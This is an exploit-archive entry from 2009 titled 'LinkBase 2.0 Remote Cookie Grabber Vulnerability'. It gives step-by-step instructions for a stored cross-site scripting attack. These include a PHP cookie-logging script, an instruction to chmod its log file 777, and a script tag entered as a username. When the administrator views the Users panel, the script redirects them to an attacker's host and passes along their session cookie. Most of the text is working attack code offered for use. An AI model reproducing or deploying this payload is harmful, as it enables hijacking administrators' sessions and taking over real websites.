[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : LinkBase 2.0 Remote Cookie Grabber Vulnerability
# Published : 2009-05-05
# Author : SirGod
# Previous Title : TemaTres 1.0.3 Remote Blind SQL Injection Exploit
# Next Title : 2daybiz Custom T-shirt Design (SQL/XSS) Multiple Remote Vulns


#################################################################################################################
[+] Download LinkBase 2.0 Cookie Grabber Exploit
[+] Discovered By SirGod
[+] www.mortal-team.net
[+] www.h4cky0u.org
[+] Greetz : All my friends
#################################################################################################################

[+] Make 2 files and upload to your host :

  stealer.php  - > Put the following code into the file :
 
<?php
$cookie = $_GET['cookie'];
$log = fopen("log.txt", "a");
fwrite($log, $cookie ."n");
fclose($log);
?>

  log.txt   - > CHMOD it 777 and put in the same directory with stealer.php
 
[+] Register as :

  <script>document.location ="http://[YOUR_HOST]/[path]/stealer.php?cookie=" + document.cookie;</script>

  Every time the admin will visit the "Users" menu from admin panel he will be redirected to your cookie stealer.

#################################################################################################################

# www.Syue.com [2009-05-05]